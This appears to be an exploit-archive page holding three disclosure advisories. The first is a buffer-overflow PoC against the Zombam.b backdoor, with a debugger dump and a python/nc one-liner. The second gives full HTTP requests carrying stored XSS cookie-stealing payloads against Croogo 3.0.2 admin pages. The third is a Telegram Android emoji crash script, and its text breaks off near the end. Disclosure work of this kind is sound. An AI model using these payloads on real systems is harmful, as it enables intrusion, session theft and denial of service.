<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/1e3665a67201209609ae493a2a590bee.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Zombam.b<br />Vulnerability: Remote Stack Buffer Overflow<br />Description: z0mbie's HTTP RAT v0.1a listens on TCP port 80 to display an HTML Web UI for basic remote administration capability. Third-party attackers who can reach an infected system can trigger a buffer overflow overwriting the EBP and EIP registers by sending a specially crafted HTTP request.<br />Type: PE32<br />MD5: 1e3665a67201209609ae493a2a590bee<br />Vuln ID: MVID-2022-0487<br />ASLR: False<br />DEP: False<br />Safe SEH: True<br />Disclosure: 02/16/2022 <br /><br />Memory Dump:<br />(148c.dd4): Access violation - code c0000005 (first/second chance not available)<br />eax=00000000 ebx=00000000 ecx=9d082a1a edx=00000000 esi=00000003 edi=00000003<br />eip=7770ed3c esp=0538f194 ebp=0538f324 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202<br />ntdll!ZwWaitForMultipleObjects+0xc:<br />7770ed3c c21400 ret 14h<br /><br />0:006> .ecxr<br />eax=00000000 ebx=040202b0 ecx=9d082a1a edx=00000000 esi=0538fb51 edi=04020330<br />eip=41414141 esp=0538fab4 ebp=41414141 iopl=0 nv up ei pl nz na po nc<br />cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202<br />41414141 ?? ???<br /><br />0:006> !analyze -v<br />*******************************************************************************<br />* *<br />* Exception Analysis *<br />* *<br />*******************************************************************************<br /><br />*** WARNING: Unable to verify checksum for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br />*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />FAULTING_IP: <br />+3485<br />41414141 ?? ???<br /><br />EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)<br />ExceptionAddress: 41414141<br /> ExceptionCode: c0000005 (Access violation)<br /> ExceptionFlags: 00000000<br />NumberParameters: 2<br /> Parameter[0]: 00000000<br /> Parameter[1]: 41414141<br />Attempt to read from address 41414141<br /><br />PROCESS_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.<br /><br />EXCEPTION_PARAMETER1: 00000000<br /><br />EXCEPTION_PARAMETER2: 41414141<br /><br />READ_ADDRESS: 41414141 <br /><br />FOLLOWUP_IP: <br />Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br />00403485 50 push eax<br /><br />FAILED_INSTRUCTION_ADDRESS: <br />+3485<br />41414141 ?? ???<br /><br />MOD_LIST: <ANALYSIS/><br /><br />NTGLOBALFLAG: 0<br /><br />APPLICATION_VERIFIER_FLAGS: 0<br /><br />FAULTING_THREAD: 00000dd4<br /><br />BUGCHECK_STR: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />PRIMARY_PROBLEM_CLASS: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />DEFAULT_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141<br /><br />IP_ON_HEAP: 41414141<br />The fault address in not in any loaded module, please check your build's rebase<br />log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may<br />contain the address if it were loaded.<br /><br />IP_IN_FREE_BLOCK: 41414141<br /><br />FRAME_ONE_INVALID: 1<br /><br />LAST_CONTROL_TRANSFER: from 41414141 to 41414141<br /><br />STACK_TEXT: <br />WARNING: Frame IP not in any known module. Following frames may be wrong.<br />0538fab0 41414141 41414141 41414141 41414141 0x41414141<br />0538fab4 41414141 41414141 41414141 41414141 0x41414141<br />0538fab8 41414141 41414141 41414141 41414141 0x41414141<br />0538fabc 41414141 41414141 41414141 41414141 0x41414141<br />0538fac0 41414141 41414141 41414141 41414141 0x41414141<br />0538fac4 41414141 41414141 41414141 41414141 0x41414141<br />0538fac8 41414141 41414141 41414141 41414141 0x41414141<br />0538facc 41414141 41414141 41414141 41414141 0x41414141<br />0538fad0 41414141 41414141 41414141 41414141 0x41414141<br />0538fad4 41414141 41414141 41414141 41414141 0x41414141<br />0538fad8 41414141 41414141 41414141 41414141 0x41414141<br />0538fadc 41414141 41414141 41414141 41414141 0x41414141<br />0538fae0 41414141 41414141 41414141 41414141 0x41414141<br />0538fae4 41414141 41414141 41414141 41414141 0x41414141<br />0538fae8 41414141 41414141 41414141 41414141 0x41414141<br />0538faec 41414141 41414141 41414141 41414141 0x41414141<br />0538faf0 41414141 41414141 41414141 41414141 0x41414141<br />0538faf4 41414141 41414141 41414141 41414141 0x41414141<br />0538faf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fafc 41414141 41414141 41414141 41414141 0x41414141<br />0538fb00 41414141 41414141 41414141 41414141 0x41414141<br />0538fb04 41414141 41414141 41414141 41414141 0x41414141<br />0538fb08 41414141 41414141 41414141 41414141 0x41414141<br />0538fb0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb10 41414141 41414141 41414141 41414141 0x41414141<br />0538fb14 41414141 41414141 41414141 41414141 0x41414141<br />0538fb18 41414141 41414141 41414141 41414141 0x41414141<br />0538fb1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb20 41414141 41414141 41414141 41414141 0x41414141<br />0538fb24 41414141 41414141 41414141 41414141 0x41414141<br />0538fb28 41414141 41414141 41414141 41414141 0x41414141<br />0538fb2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb30 41414141 41414141 41414141 41414141 0x41414141<br />0538fb34 41414141 41414141 41414141 41414141 0x41414141<br />0538fb38 41414141 41414141 41414141 41414141 0x41414141<br />0538fb3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb40 41414141 41414141 41414141 41414141 0x41414141<br />0538fb44 41414141 41414141 41414141 41414141 0x41414141<br />0538fb48 41414141 41414141 41414141 41414141 0x41414141<br />0538fb4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb50 41414141 41414141 41414141 41414141 0x41414141<br />0538fb54 41414141 41414141 41414141 41414141 0x41414141<br />0538fb58 41414141 41414141 41414141 41414141 0x41414141<br />0538fb5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb60 41414141 41414141 41414141 41414141 0x41414141<br />0538fb64 41414141 41414141 41414141 41414141 0x41414141<br />0538fb68 41414141 41414141 41414141 41414141 0x41414141<br />0538fb6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb70 41414141 41414141 41414141 41414141 0x41414141<br />0538fb74 41414141 41414141 41414141 41414141 0x41414141<br />0538fb78 41414141 41414141 41414141 41414141 0x41414141<br />0538fb7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb80 41414141 41414141 41414141 41414141 0x41414141<br />0538fb84 41414141 41414141 41414141 41414141 0x41414141<br />0538fb88 41414141 41414141 41414141 41414141 0x41414141<br />0538fb8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fb90 41414141 41414141 41414141 41414141 0x41414141<br />0538fb94 41414141 41414141 41414141 41414141 0x41414141<br />0538fb98 41414141 41414141 41414141 41414141 0x41414141<br />0538fb9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fba0 41414141 41414141 41414141 41414141 0x41414141<br />0538fba4 41414141 41414141 41414141 41414141 0x41414141<br />0538fba8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbac 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbe8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbec 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fbf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fbfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fc00 41414141 41414141 41414141 41414141 0x41414141<br />0538fc04 41414141 41414141 41414141 41414141 0x41414141<br />0538fc08 41414141 41414141 41414141 41414141 0x41414141<br />0538fc0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc10 41414141 41414141 41414141 41414141 0x41414141<br />0538fc14 41414141 41414141 41414141 41414141 0x41414141<br />0538fc18 41414141 41414141 41414141 41414141 0x41414141<br />0538fc1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc20 41414141 41414141 41414141 41414141 0x41414141<br />0538fc24 41414141 41414141 41414141 41414141 0x41414141<br />0538fc28 41414141 41414141 41414141 41414141 0x41414141<br />0538fc2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc30 41414141 41414141 41414141 41414141 0x41414141<br />0538fc34 41414141 41414141 41414141 41414141 0x41414141<br />0538fc38 41414141 41414141 41414141 41414141 0x41414141<br />0538fc3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc40 41414141 41414141 41414141 41414141 0x41414141<br />0538fc44 41414141 41414141 41414141 41414141 0x41414141<br />0538fc48 41414141 41414141 41414141 41414141 0x41414141<br />0538fc4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc50 41414141 41414141 41414141 41414141 0x41414141<br />0538fc54 41414141 41414141 41414141 41414141 0x41414141<br />0538fc58 41414141 41414141 41414141 41414141 0x41414141<br />0538fc5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc60 41414141 41414141 41414141 41414141 0x41414141<br />0538fc64 41414141 41414141 41414141 41414141 0x41414141<br />0538fc68 41414141 41414141 41414141 41414141 0x41414141<br />0538fc6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc70 41414141 41414141 41414141 41414141 0x41414141<br />0538fc74 41414141 41414141 41414141 41414141 0x41414141<br />0538fc78 41414141 41414141 41414141 41414141 0x41414141<br />0538fc7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc80 41414141 41414141 41414141 41414141 0x41414141<br />0538fc84 41414141 41414141 41414141 41414141 0x41414141<br />0538fc88 41414141 41414141 41414141 41414141 0x41414141<br />0538fc8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fc90 41414141 41414141 41414141 41414141 0x41414141<br />0538fc94 41414141 41414141 41414141 41414141 0x41414141<br />0538fc98 41414141 41414141 41414141 41414141 0x41414141<br />0538fc9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fca0 41414141 41414141 41414141 41414141 0x41414141<br />0538fca4 41414141 41414141 41414141 41414141 0x41414141<br />0538fca8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcac 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fccc 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcdc 41414141 41414141 41414141 41414141 0x41414141<br />0538fce0 41414141 41414141 41414141 41414141 0x41414141<br />0538fce4 41414141 41414141 41414141 41414141 0x41414141<br />0538fce8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcec 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fcf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fcfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fd00 41414141 41414141 41414141 41414141 0x41414141<br />0538fd04 41414141 41414141 41414141 41414141 0x41414141<br />0538fd08 41414141 41414141 41414141 41414141 0x41414141<br />0538fd0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd10 41414141 41414141 41414141 41414141 0x41414141<br />0538fd14 41414141 41414141 41414141 41414141 0x41414141<br />0538fd18 41414141 41414141 41414141 41414141 0x41414141<br />0538fd1c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd20 41414141 41414141 41414141 41414141 0x41414141<br />0538fd24 41414141 41414141 41414141 41414141 0x41414141<br />0538fd28 41414141 41414141 41414141 41414141 0x41414141<br />0538fd2c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd30 41414141 41414141 41414141 41414141 0x41414141<br />0538fd34 41414141 41414141 41414141 41414141 0x41414141<br />0538fd38 41414141 41414141 41414141 41414141 0x41414141<br />0538fd3c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd40 41414141 41414141 41414141 41414141 0x41414141<br />0538fd44 41414141 41414141 41414141 41414141 0x41414141<br />0538fd48 41414141 41414141 41414141 41414141 0x41414141<br />0538fd4c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd50 41414141 41414141 41414141 41414141 0x41414141<br />0538fd54 41414141 41414141 41414141 41414141 0x41414141<br />0538fd58 41414141 41414141 41414141 41414141 0x41414141<br />0538fd5c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd60 41414141 41414141 41414141 41414141 0x41414141<br />0538fd64 41414141 41414141 41414141 41414141 0x41414141<br />0538fd68 41414141 41414141 41414141 41414141 0x41414141<br />0538fd6c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd70 41414141 41414141 41414141 41414141 0x41414141<br />0538fd74 41414141 41414141 41414141 41414141 0x41414141<br />0538fd78 41414141 41414141 41414141 41414141 0x41414141<br />0538fd7c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd80 41414141 41414141 41414141 41414141 0x41414141<br />0538fd84 41414141 41414141 41414141 41414141 0x41414141<br />0538fd88 41414141 41414141 41414141 41414141 0x41414141<br />0538fd8c 41414141 41414141 41414141 41414141 0x41414141<br />0538fd90 41414141 41414141 41414141 41414141 0x41414141<br />0538fd94 41414141 41414141 41414141 41414141 0x41414141<br />0538fd98 41414141 41414141 41414141 41414141 0x41414141<br />0538fd9c 41414141 41414141 41414141 41414141 0x41414141<br />0538fda0 41414141 41414141 41414141 41414141 0x41414141<br />0538fda4 41414141 41414141 41414141 41414141 0x41414141<br />0538fda8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdac 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdb8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdbc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdc8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdcc 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdd8 41414141 41414141 41414141 41414141 0x41414141<br />0538fddc 41414141 41414141 41414141 41414141 0x41414141<br />0538fde0 41414141 41414141 41414141 41414141 0x41414141<br />0538fde4 41414141 41414141 41414141 41414141 0x41414141<br />0538fde8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdec 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf0 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf4 41414141 41414141 41414141 41414141 0x41414141<br />0538fdf8 41414141 41414141 41414141 41414141 0x41414141<br />0538fdfc 41414141 41414141 41414141 41414141 0x41414141<br />0538fe00 41414141 41414141 41414141 41414141 0x41414141<br />0538fe04 41414141 41414141 41414141 41414141 0x41414141<br />0538fe08 41414141 41414141 41414141 41414141 0x41414141<br />0538fe0c 41414141 41414141 41414141 41414141 0x41414141<br />0538fe10 41414141 41414141 41414141 41414141 0x41414141<br />0538fe14 41414141 41414141 41414141 41414141 0x41414<br /><br />STACK_COMMAND: ~6s; .ecxr ; kb<br /><br />SYMBOL_STACK_INDEX: e9<br /><br />SYMBOL_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br />FOLLOWUP_NAME: MachineOwner<br /><br />MODULE_NAME: Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee<br /><br />IMAGE_NAME: Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe<br /><br />DEBUG_FLR_IMAGE_TIMESTAMP: 3e780ebf<br /><br />FAILURE_BUCKET_ID: BAD_INSTRUCTION_PTR_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Zombam.b.1e3665a67201209609ae493a2a590bee.exe!Unknown<br /><br />BUCKET_ID: APPLICATION_FAULT_BAD_INSTRUCTION_PTR_INVALID_POINTER_READ_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_Backdoor_Win32_Zombam_b_1e3665a67201209609ae493a2a590bee+3485<br /><br /><br />Exploit/PoC:<br />python -c "print('GET /'+'A'*15028 +' HTTP/1.0\r\nHost: 192.168.18.125\r\n\r\n')" | nc64.exe 192.168.18.125 80 -v<br />125.18.168.192.in-addr.arpa [192.168.18.125] 80 (http) open<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Croogo 3.0.2 - 'Multiple' Stored Cross-Site Scripting (XSS)<br /># Date: 06/12/2021<br /># Exploit Author: Enes Özeser<br /># Vendor Homepage: https://croogo.org/<br /># Software Link: https://downloads.croogo.org/v3.0.2.zip<br /># Version: 3.0.2<br /># Tested on: Windows 10 Home Single Language 20H2 & WampServer 3.2.3<br /><br />==> 'Content-Type' Stored Cross-Site Scripting (/admin/file-manager/attachments/add) <==<br /><br />POST /admin/file-manager/attachments/add HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------114221148012003093972656004730<br />Content-Length: 923<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/add<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_method"<br /><br />POST<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_csrfToken"<br /><br />c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="file"; filename="file.txt"<br />Content-Type: <script>alert(document.cookie)</script><br /><br />Enes Ozeser (@enesozeser)<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[fields]"<br /><br />16ade00fae1eb7183f11fe75ed658ae4ec2a5921%3A<br />-----------------------------114221148012003093972656004730<br />Content-Disposition: form-data; name="_Token[unlocked]"<br /><br /><br />-----------------------------114221148012003093972656004730--<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/taxonomy/types/edit/) <==<br /><br />POST /admin/taxonomy/types/edit/5 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 590<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)admin/taxonomy/types/edit/5<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&description=Description&vocabularies[_ids]=&comment_status=&comment_status=2&comment_approve=0&<br />comment_approve=1&comment_spam_protection=0&comment_captcha=0&params=routes=true&format_show_author=0&format_show_author=1&format_show_date=0&format_show_date=1&<br />format_use_wysiwyg=0&format_use_wysiwyg=1&_Token[fields]=ee5145e2485f47bddda98c72f96db218bffdd827%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/blocks/regions/edit/) <==<br /><br />POST /admin/blocks/regions/edit/3 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 336<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/blocks/regions/edit/3<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&alias=Alias&_Token[fields]=49781a41a2787c301464989f09805bc79fa26c13%3A&_Token[unlocked]=_apply<br /><br /><br />==> 'title' Stored Cross-Site Scripting (/admin/file-manager/attachments/edit/) <==<br /><br />POST /admin/file-manager/attachments/edit/20 HTTP/1.1<br />Host: (HOST)<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 363<br />Origin: http://(HOST)<br />Connection: close<br />Referer: http://(HOST)/admin/file-manager/attachments/edit/20<br />Cookie: csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a; CAKEPHP=ba820s2lf013a07a2mhg5hccup<br />Upgrade-Insecure-Requests: 1<br />Sec-Fetch-Dest: document<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-User: ?1<br /><br />_method=PUT&_csrfToken=c49348b47c99523135d42caefb6da7148946a8d049dc40e4763b8acb570b77d6d9353ee2be724c716679c9d6f7006a0545dbe68fe77bd8e3019994bef968a67a&<br />title=<script>alert(document.cookie)</script>&excerpt=&file_url=http://(HOST)/uploads/file.txt&file_type=text/plain&_Token[fields]=6170a60e541f596fe579a5e70fea879aafb9ac14%3A&_Token[unlocked]=_apply<br /></code></pre>
<pre><code>Document Title:<br />===============<br />Telegram Android v8.4.4 - Denial of Service (PoC)<br /><br /><br />References (Source):<br />====================<br />https://twitter.com/h4shur<br /><br /><br />Release Date:<br />=============<br />2022-01-30<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />7.8<br /><br /><br />Product & Service Introduction:<br />===============================<br />Telegram is a freeware, cross-platform, cloud-based instant messaging (IM)<br />service. The service also provides end-to-end encrypted video calling,<br />VoIP, file sharing and several other features. It was launched for iOS on<br />14 August 2013 and Android in October 2013. The servers of Telegram are<br />distributed worldwide to decrease frequent data load with five data centers<br />in different regions, while the operational center is based in Dubai in the<br />United Arab Emirates. Various client apps are available for desktop and<br />mobile platforms including official apps for Android, iOS, Windows, macOS<br />and Linux (although registration requires an iOS or Android device and a<br />working phone number). There are also two official Telegram web twin apps –<br />WebK and WebZ – and numerous unofficial clients that make use of Telegram's<br />protocol. All of Telegram's official components are open source, with the<br />exception of the server which is closed-sourced and proprietary.<br /><br />Telegram provides end-to-end encrypted voice and video calls and optional<br />end-to-end encrypted "secret" chats. Cloud chats and groups are encrypted<br />between the app and the server, so that ISPs and other third-parties on the<br />network can't access data, but the Telegram server can. Users can send text<br />and voice messages, make voice and video calls, and share an unlimited<br />number of images, documents (2 GB per file), user locations, animated<br />stickers, contacts, and audio files. In January 2021, Telegram surpassed<br />500 million monthly active users. It was the most downloaded app worldwide<br />in January 2021 with 1 billion downloads globally as of late August 2021.<br /><br /><br />Abstract Advisory Information:<br />==============================<br />An independent vulnerability researcher discovered Android application<br />vulnerabilities in the Telegram application.<br /><br /><br />Affected Product(s):<br />====================<br />Vendor: telegram.org / telegram.me / t.me<br />Product: Android Telegram application (Android-Application)<br />https://telegram.org/android<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-01-30: Researcher Notification & Coordination (Security Researcher)<br />2022-01-30: Public Disclosure<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />local<br /><br /><br />Severity Level:<br />===============<br />medium<br /><br /><br />Disclosure Type:<br />================<br />Full Disclosure<br /><br /><br />Technical specifications and description:<br />================================<br />1.1<br />In version 8.4.4 of Android Telegram application, a denial of service<br />vulnerability was discovered by H4shur. Vulnerability is in the emojis of<br />these messenger.<br /><br />1.2<br />If you send a number of flag emojis with any text on the chat page,<br />clicking on that message will stop the program altogether and avoid<br />providing services.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the resources<br />of a system from the reach of its users.<br />It is natural that if this attack is successful, the result will be a<br />slowdown or disabling of the equipment and resources available to the<br />victim.<br />For security demonstration or to reproduce the persistent cross site web<br />vulnerability follow the provided information and steps below to continue.<br /><br /><br />PoC: Exploitation<br />1.1<br />Run the python script, it will create a new file "outputbufferh4shur.txt".<br />1.2<br />Run Telegram Android and go to "Saved Messages" or any Chat page.<br />1.3<br />Copy the content of the file "outputbufferh4shur.txt".<br />1.4<br />Paste the content of outputbufferh4shur.txt into the "Write a message..."<br />and then type any text to this message.<br />1.5<br />Ops...<br />Telegram Crashed <3<br /><br /><br />script:<br />bufferh4shur = "🇮🇷" * 114<br />try:<br /> f=open("outputbufferh4shur.txt","w")<br /> print("[!] Creating %s bytes DOS payload...." %len(bufferh4shur))<br /> f.write(bufferh4shur)<br /> f.close()<br /> print("[!] File Created!")<br />except:<br /> print("File cannot be created!")<br /><br /><br /><br />Security Risk:<br />==============<br />1.1<br />A Denial of Service (DOS) attack is a type of cyberattack in which a<br />malicious person performs an attack with the aim of removing the 